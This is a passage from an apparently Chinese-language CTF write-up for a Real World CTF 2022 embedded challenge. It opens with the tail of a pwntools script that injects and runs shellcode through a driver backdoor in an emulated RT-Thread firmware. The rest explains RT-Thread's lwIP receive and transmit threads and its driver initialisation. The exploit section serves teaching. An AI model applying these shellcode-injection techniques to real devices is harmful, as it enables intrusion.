&quot;action&quot;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">rt_printf_fmt:  .asciz  &quot;shellcode status: %d\\n&quot;</span></span><br><span class="line"><span class="string">backdoor_fmt:   .asciz  &quot;backdoor: %s\\n&quot;</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>: </span><br><span class="line">    <span class="comment"># 启动 qemu</span></span><br><span class="line">    p = process(<span class="string">&quot;./dbg.sh&quot;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&quot;lwIP-2.1.3 initialized!&quot;</span>)</span><br><span class="line">    time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 发送并执行 shellcode</span></span><br><span class="line">    log.info(<span class="string">&quot;exploiting...&quot;</span>)</span><br><span class="line">    session = create_session()</span><br><span class="line">    submit_msg(session, <span class="string">b&quot;ShellcodeHeader&quot;</span> + sc_bytecode)</span><br><span class="line">    execute_shellcode(shellcode_addr)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 手动进行 health check，并获取 flag</span></span><br><span class="line">    <span class="comment"># print(p.recvall(timeout=1))</span></span><br><span class="line">    <span class="comment"># os.system(&quot;python3 ./flag.py&quot;)</span></span><br><span class="line">    p.interactive()</span><br></pre></td></tr></table></figure><p>效果：</p><p><img src="/2022/01/rwctf2022_flag/image-20220131114450939.png" alt="image-20220131114450939"></p><h2 id="七、RT-thread-–-lwIP">七、RT-thread – lwIP</h2><p>这题的题解如上文所示，到此为止。接下来我们来简单扩展一下内容。</p><h3 id="a-Overview">a. Overview</h3><p>这一题 FreeRTOS 中的 lwIP 协议栈模块，是使用的 RT-thread （国产 RTOS）中的 lwIP 。</p><blockquote><p>根据出题人的想法，使用 RT-thread 中的 lwIP 是为了便于调试。</p><p>出题也不容易…</p></blockquote><p>lwIP 是一个小型开源的 TCP/IP 协议栈，重点是在保持 TCP 主要功能的基础上减少对 RAM 的占用，适合嵌入式系统。RT-thread 中，协议栈的驱动架构图如下：</p><p><img src="/2022/01/rwctf2022_flag/an010_lwip_block.png" alt="驱动架构图"></p><p>RT-thread 在原版 lwIP 的基础上，新增了一个网络设备层。该层对以太网数据收发采用<strong>独立双线程结构</strong>。</p><p><img src="/2022/01/rwctf2022_flag/an010_rt_xxx_eth_rx.png" alt="数据接收流程"></p><p>当以太网硬件接收到数据报文后，硬件会将数据放入缓冲区，之后触发硬件中断。所注册的中断处理例程会发送邮件（mail）通知数据接收线程 erx ，使其根据报文长度申请 pbuf、读入数据，并在数据接收完成后，继续发送邮件唤醒 TCP/IP 线程进行进一步的处理。</p><p><img src="/2022/01/rwctf2022_flag/etx.png" alt="数据发送流程"></p><p>当有数据需要发送时，lwIP 会通过邮件向 etx 线程发送请求，之后永久等待 tx_ack 信号量，等待数据发送完成。而当 ext 线程数据发送完成后， tx_ack 信号量将会被设置，通知 lwIP 数据已经发送完成。</p><p>接下来，我们来简单看看这个数据收发的过程。</p><h3 id="b-lwip-init">b. lwip_init</h3><p>初始时，RTOS 中控制流会执行 <code>lwip_system_init</code> 函数来进行一系列的初始化操作。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * LwIP system initialization</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="keyword">extern</span> <span class="type">int</span> <span class="title">eth_system_device_init_private</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">lwip_system_init</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    ...</span><br><span class="line">    <span class="built_in">eth_system_device_init_private</span>();</span><br><span class="line">    ...</span><br><span class="line">    <span class="built_in">tcpip_init</span>(tcpip_init_done_callback, (<span class="type">void</span> *)&amp;done_sem);</span><br><span class="line">    ...</span><br><span class="line">    <span class="built_in">rt_kprintf</span>(<span class="string">&quot;lwIP-%d.%d.%d initialized!\n&quot;</span>, LWIP_VERSION_MAJOR, LWIP_VERSION_MINOR, LWIP_VERSION_REVISION);</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>该函数：</p><ul><li>执行 <code>eth_system_device_init_private</code> 初始化 erx 和 etx 线程。</li><li>调用 <code>tcpip_init</code> 创建 tcpip 线程。</li><li>输出回显信息。可以看到这里输出的信息和题目输出的是一样的。</li></ul><p>这里我们只关注 <code>eth_system_device_init_private</code> 函数，该函数只做了两件事：创建 etx 和 erx 线程，并创建对应的邮箱。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">eth_system_device_init_private</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">rt_err_t</span> result = RT_EOK;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* initialize Rx thread. */</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> LWIP_NO_RX_THREAD</span></span><br><span class="line">    <span class="comment">/* initialize mailbox and create Ethernet Rx thread */</span></span><br><span class="line">    result = <span class="built_in">rt_mb_init</span>(&amp;eth_rx_thread_mb, <span class="string">&quot;erxmb&quot;</span>,</span><br><span class="line">                        &amp;eth_rx_thread_mb_pool[<span class="number">0</span>], <span class="built_in">sizeof</span>(eth_rx_thread_mb_pool)/<span class="number">4</span>,</span><br><span class="line">                        RT_IPC_FLAG_FIFO);</span><br><span class="line">    <span class="built_in">RT_ASSERT</span>(result == RT_EOK);</span><br><span class="line"></span><br><span class="line">    result = <span class="built_in">rt_thread_init</span>(&amp;eth_rx_thread, <span class="string">&quot;erx&quot;</span>, eth_rx_thread_entry, RT_NULL,</span><br><span class="line">                            &amp;eth_rx_thread_stack[<span class="number">0</span>], <span class="built_in">sizeof</span>(eth_rx_thread_stack),</span><br><span class="line">                            RT_ETHERNETIF_THREAD_PREORITY, <span class="number">16</span>);</span><br><span class="line">    <span class="built_in">RT_ASSERT</span>(result == RT_EOK);</span><br><span class="line">    result = <span class="built_in">rt_thread_startup</span>(&amp;eth_rx_thread);</span><br><span class="line">    <span class="built_in">RT_ASSERT</span>(result == RT_EOK);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/* initialize Tx thread */</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> LWIP_NO_TX_THREAD</span></span><br><span class="line">    <span class="comment">/* initialize mailbox and create Ethernet Tx thread */</span></span><br><span class="line">    result = <span class="built_in">rt_mb_init</span>(&amp;eth_tx_thread_mb, <span class="string">&quot;etxmb&quot;</span>,</span><br><span class="line">                        &amp;eth_tx_thread_mb_pool[<span class="number">0</span>], <span class="built_in">sizeof</span>(eth_tx_thread_mb_pool)/<span class="number">4</span>,</span><br><span class="line">                        RT_IPC_FLAG_FIFO);</span><br><span class="line">    <span class="built_in">RT_ASSERT</span>(result == RT_EOK);</span><br><span class="line"></span><br><span class="line">    result = <span class="built_in">rt_thread_init</span>(&amp;eth_tx_thread, <span class="string">&quot;etx&quot;</span>, eth_tx_thread_entry, RT_NULL,</span><br><span class="line">                            &amp;eth_tx_thread_stack[<span class="number">0</span>], <span class="built_in">sizeof</span>(eth_tx_thread_stack),</span><br><span class="line">                            RT_ETHERNETIF_THREAD_PREORITY, <span class="number">16</span>);</span><br><span class="line">    <span class="built_in">RT_ASSERT</span>(result == RT_EOK);</span><br><span class="line"></span><br><span class="line">    result = <span class="built_in">rt_thread_startup</span>(&amp;eth_tx_thread);</span><br><span class="line">    <span class="built_in">RT_ASSERT</span>(result == RT_EOK);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> (<span class="type">int</span>)result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>我们看看 erx 线程主要干了什么事情：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Ethernet Rx Thread */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">eth_rx_thread_entry</span><span class="params">(<span class="type">void</span>* parameter)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">eth_device</span>* device;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 尝试从邮箱中读取邮件，如果没有邮件则一直阻塞</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">rt_mb_recv</span>(&amp;eth_rx_thread_mb, (<span class="type">rt_ubase_t</span> *)&amp;device, RT_WAITING_FOREVER) == RT_EOK)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="type">rt_base_t</span> level;</span><br><span class="line">            <span class="keyword">struct</span> <span class="title class_">pbuf</span> *p;</span><br><span class="line">            ...</span><br><span class="line">            <span class="comment">/* receive all of buffer */</span></span><br><span class="line">            <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">if</span>(device-&gt;eth_rx == RT_NULL) <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">                <span class="comment">// 调用注册的 eth_rx 函数，从 device 中接收数据</span></span><br><span class="line">                p = device-&gt;<span class="built_in">eth_rx</span>(&amp;(device-&gt;parent));</span><br><span class="line">                <span class="keyword">if</span> (p != RT_NULL)</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="comment">/* notify to upper layer */</span></span><br><span class="line">                    <span class="comment">// 在这里将接收到的数据传给 TCPIP 线程</span></span><br><span class="line">                    <span class="keyword">if</span>( device-&gt;netif-&gt;<span class="built_in">input</span>(p, device-&gt;netif) != ERR_OK )</span><br><span class="line">                    &#123;</span><br><span class="line">                        <span class="built_in">LWIP_DEBUGF</span>(NETIF_DEBUG, (<span class="string">&quot;ethernetif_input: Input error\n&quot;</span>));</span><br><span class="line">                        <span class="built_in">pbuf_free</span>(p);</span><br><span class="line">                        p = <span class="literal">NULL</span>;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">else</span> <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="built_in">LWIP_ASSERT</span>(<span class="string">&quot;Should not happen!\n&quot;</span>,<span class="number">0</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>从代码中可以得知，该线程会循环<strong>读取邮箱 -&gt; 从 device 中读取数据 -&gt; 把读取的数据传给 TCPIP 线程</strong>这样的一个过程。</p><p>而另一个 etx  线程主要用于和硬件打交道，将 TCPIP 线程发至 etx 线程的数据转发给具体的 device 执行发包操作，待发包完成后发送 ack 回 TCPIP 线程：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Ethernet Tx Thread */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">eth_tx_thread_entry</span><span class="params">(<span class="type">void</span>* parameter)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">eth_tx_msg</span>* msg;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 阻塞读取邮件</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">rt_mb_recv</span>(&amp;eth_tx_thread_mb, (<span class="type">rt_ubase_t</span> *)&amp;msg, RT_WAITING_FOREVER) == RT_EOK)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">struct</span> <span class="title class_">eth_device</span>* enetif;</span><br><span class="line"></span><br><span class="line">            <span class="built_in">RT_ASSERT</span>(msg-&gt;netif != RT_NULL);</span><br><span class="line">            <span class="built_in">RT_ASSERT</span>(msg-&gt;buf   != RT_NULL);</span><br><span class="line"></span><br><span class="line">            enetif = (<span class="keyword">struct</span> eth_device*)msg-&gt;netif-&gt;state;</span><br><span class="line">            <span class="keyword">if</span> (enetif != RT_NULL)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="comment">/* call driver&#x27;s interface */</span></span><br><span class="line">                <span class="comment">// 尝试发包</span></span><br><span class="line">                <span class="keyword">if</span> (enetif-&gt;<span class="built_in">eth_tx</span>(&amp;(enetif-&gt;parent), msg-&gt;buf) != RT_EOK)</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="comment">/* transmit eth packet failed */</span></span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="comment">/* send ACK */</span> <span class="comment">// 发包完了之后发送 ACK 回到 TCPIP</span></span><br><span class="line">            <span class="built_in">rt_completion_done</span>(&amp;msg-&gt;ack);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="c-hw-init">c. hw_init</h3><p>上面是 lwIP 中关于 etx 和 erx 线程的初始化。实际的数据收发操作都是由具体的硬件来完成，那硬件是怎么注册的呢？</p><p>这里以 <code>qemu-vexpress-a9</code> 设备为例（没错就是 flag 题所用设备）</p><p>根据以下调用链：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief  This function will call all levels of initialization functions to complete</span></span><br><span class="line"><span class="comment"> *         the initialization of the system, and finally start the scheduler.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">rtthread_startup</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line">    </span><br><span class="line">=&gt; 调用 =&gt; </span><br><span class="line">    </span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief  This function will create and start the main thread, but this thread</span></span><br><span class="line"><span class="comment"> *         will not run until the scheduler starts.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="type">void</span> <span class="built_in">rt_application_init</span>(<span class="type">void</span>);</span><br><span class="line"></span><br><span class="line">=&gt; 创建 main 线程，线程执行函数 =&gt;</span><br><span class="line"> </span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief  The system main thread. In this thread will call the rt_components_init()</span></span><br><span class="line"><span class="comment"> *         for initialization of RT-Thread Components and call the user&#x27;s programming</span></span><br><span class="line"><span class="comment"> *         entry main().</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="type">void</span> <span class="built_in">main_thread_entry</span>(<span class="type">void</span> *parameter);</span><br><span class="line"></span><br><span class="line">=&gt; 调用 =&gt; </span><br><span class="line">    </span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief  RT-Thread Components Initialization.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="type">void</span> <span class="built_in">rt_components_init</span>(<span class="type">void</span>);</span><br></pre></td></tr></table></figure><p>我们可以找到函数 <code>rt_components_init</code> 的实现：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * @brief  RT-Thread Components Initialization.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">rt_components_init</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> RT_DEBUG_INIT</span></span><br><span class="line">    [...]</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line">    <span class="keyword">volatile</span> <span class="type">const</span> <span class="type">init_fn_t</span> *fn_ptr;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (fn_ptr = &amp;__rt_init_rti_board_end; fn_ptr &lt; &amp;__rt_init_rti_end; fn_ptr ++)</span><br><span class="line">    &#123;</span><br><span class="line">        (*fn_ptr)();</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span> <span class="comment">/* RT_DEBUG_INIT */</span></span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>这里，是不是很像先前使用 IDA 反编译 backdoor 向上找交叉引用的地方？</p></blockquote><p>我们可以看到，该函数会遍历从 <code>__rt_init_rti_board_end -&gt; __rt_init_rti_end</code> 上的每个函数指针，并执行。这两个函数指针代表了什么呢？阅读一下相关的代码和注释：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Components Initialization will initialize some driver and components as following</span></span><br><span class="line"><span class="comment"> * order:</span></span><br><span class="line"><span class="comment"> * rti_start         --&gt; 0</span></span><br><span class="line"><span class="comment"> * BOARD_EXPORT      --&gt; 1</span></span><br><span class="line"><span class="comment"> * rti_board_end     --&gt; 1.end</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * DEVICE_EXPORT     --&gt; 2</span></span><br><span class="line"><span class="comment"> * COMPONENT_EXPORT  --&gt; 3</span></span><br><span class="line"><span class="comment"> * FS_EXPORT         --&gt; 4</span></span><br><span class="line"><span class="comment"> * ENV_EXPORT        --&gt; 5</span></span><br><span class="line"><span class="comment"> * APP_EXPORT        --&gt; 6</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * rti_end           --&gt; 6.end</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * These automatically initialization, the driver or component initial function must</span></span><br><span class="line"><span class="comment"> * be defined with:</span></span><br><span class="line"><span class="comment"> * INIT_BOARD_EXPORT(fn);</span></span><br><span class="line"><span class="comment"> * INIT_DEVICE_EXPORT(fn);</span></span><br><span class="line"><span class="comment"> * ...</span></span><br><span class="line"><span class="comment"> * INIT_APP_EXPORT(fn);</span></span><br><span class="line"><span class="comment"> * etc.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">rti_start</span><span class="params">(<span class="type">void</span>)</span> </span>&#123; <span class="keyword">return</span> <span class="number">0</span>; &#125;</span><br><span class="line"><span class="built_in">INIT_EXPORT</span>(rti_start, <span class="string">&quot;0&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">rti_board_start</span><span class="params">(<span class="type">void</span>)</span> </span>&#123; <span class="keyword">return</span> <span class="number">0</span>; &#125;</span><br><span class="line"><span class="built_in">INIT_EXPORT</span>(rti_board_start, <span class="string">&quot;0.end&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">rti_board_end</span><span class="params">(<span class="type">void</span>)</span> </span>&#123; <span class="keyword">return</span> <span class="number">0</span>; &#125;</span><br><span class="line"><span class="built_in">INIT_EXPORT</span>(rti_board_end, <span class="string">&quot;1.end&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">rti_end</span><span class="params">(<span class="type">void</span>)</span> </span>&#123; <span class="keyword">return</span> <span class="number">0</span>; &#125;</span><br><span class="line"><span class="built_in">INIT_EXPORT</span>(rti_end, <span class="string">&quot;6.end&quot;</span>);</span><br></pre></td></tr></table></figure><p>还有这个宏定义：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> INIT_EXPORT(fn, level)                                                       \</span></span><br><span class="line"><span class="meta">            RT_USED const init_fn_t __rt_init_##fn RT_SECTION(<span class="string">&quot;.rti_fn.&quot;</span> level) = fn</span></span><br></pre></td></tr></table></figure><p>可以得出结论：对于编译出来的二进制文件中，存在一个数据段，名为 <code>.rti_fn</code>。这个段上存放着一些函数指针，用于初始化一系列设备等等；而刚刚所说的两个函数指针所表示的是<strong>注册在这个段上的两个函数指针，用于标识段上特定类型函数指针的位置</strong>。</p><p>这里我们可以看到，使用宏 <code>INIT_APP_EXPORT</code> 声明的设备，其函数指针也会存放在 <strong>__rt_init_rti_board_end -&gt; __rt_init_rti_end</strong> 这个范围。</p><blockquote><p>也就是说使用 INIT_APP_EXPORT 声明的设备，其初始化函数会在 <code>rt_components_init</code> 中执行。</p></blockquote><h3 id="d-smc911-init">d. smc911_init</h3><p>接下来我们看看 <code>smc911x</code> 设备驱动，也就是 backdoor 所在的设备驱动 （<code>bsp\qemu-vexpress-a9\drivers\drv_smc911x.c</code>）。</p><p>可以看到，该文件中存在这样的一条语句：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">INIT_APP_EXPORT</span>(smc911x_emac_hw_init);</span><br></pre></td></tr></table></figure><p>也就是说 smc911x 设备将初始化函数 <code>smc911x_emac_hw_init</code> 注册进了 <code>.rti_fn</code> 段中，等待被函数 <code>rt_components_init</code> 所调用。<br>而 <code>smc911x_emac_hw_init</code> 函数源码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">smc911x_emac_hw_init</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    _emac.iobase = VEXPRESS_ETH_BASE;</span><br><span class="line">    <span class="comment">// 设置中断号</span></span><br><span class="line">    _emac.irqno  = IRQ_VEXPRESS_A9_ETH;</span><br><span class="line">    ...</span><br><span class="line">    <span class="comment">/* set INT CFG */</span></span><br><span class="line">    <span class="built_in">smc911x_reg_write</span>(&amp;_emac, LAN9118_IRQ_CFG, LAN9118_IRQ_CFG_IRQ_POL | LAN9118_IRQ_CFG_IRQ_TYPE);</span><br><span class="line">    ...</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> RT_USING_DEVICE_OPS</span></span><br><span class="line">    _emac.parent.parent.ops        = &amp;smc911x_emac_ops;</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line">    _emac.parent.parent.init       = smc911x_emac_init;</span><br><span class="line">    _emac.parent.parent.open       = RT_NULL;</span><br><span class="line">    _emac.parent.parent.close      = RT_NULL;</span><br><span class="line">    _emac.parent.parent.read       = RT_NULL;</span><br><span class="line">    _emac.parent.parent.write      = RT_NULL;</span><br><span class="line">    _emac.parent.parent.control    = smc911x_emac_control;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    _emac.parent.parent.user_data  = RT_NULL;</span><br><span class="line">    <span class="comment">// 注意! 这里设置了 eth_rx 和 eth_tx 方法</span></span><br><span class="line">    _emac.parent.eth_rx     = smc911x_emac_rx;</span><br><span class="line">    _emac.parent.eth_tx     = smc911x_emac_tx;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* register ETH device */</span></span><br><span class="line">    <span class="comment">// 对 eth device 进行初始化</span></span><br><span class="line">    <span class="built_in">eth_device_init</span>(&amp;(_emac.parent), <span class="string">&quot;e0&quot;</span>);</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>该函数主要设置了一些操作（ops），例如 <code>smc911x_emac_init</code>、<code>smc911x_emac_rx</code>、<code>smc911x_emac_tx</code>。我们可以看到该函数为结构体 <code>_emac</code> 设置了 <code>eth_rx</code> 和 <code>eth_tx</code> 字段，因此当 lwIP 线程需要收发信息时，会调用该设备的 <code>smc911x_emac_rx</code>、<code>smc911x_emac_tx</code> 这两个函数。</p><p>这里比较有意思的是结构体 <code>_emac</code> 的类继承关系：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">eth_device_smc911x</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">/* inherit from Ethernet device 